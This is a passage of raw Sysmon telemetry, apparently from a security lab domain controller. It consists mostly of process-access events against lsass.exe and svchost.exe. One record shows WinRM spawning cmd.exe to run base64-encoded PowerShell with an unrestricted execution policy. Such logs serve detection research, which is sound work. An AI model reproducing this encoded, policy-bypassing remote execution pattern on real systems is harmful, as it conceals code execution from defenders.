13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8579-5FCF-8E00-000000009101}50964196C:\Windows\system32\WinrsHost.exe{10ACEC4A-8579-5FCF-9000-000000009101}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8579-5FCF-9000-000000009101}4152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.295{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.295{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.295{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.295{10ACEC4A-8541-5FCF-1500-000000009101}13644136C:\Windows\system32\svchost.exe{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.279{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.279{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8579-5FCF-8F00-000000009101}5108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 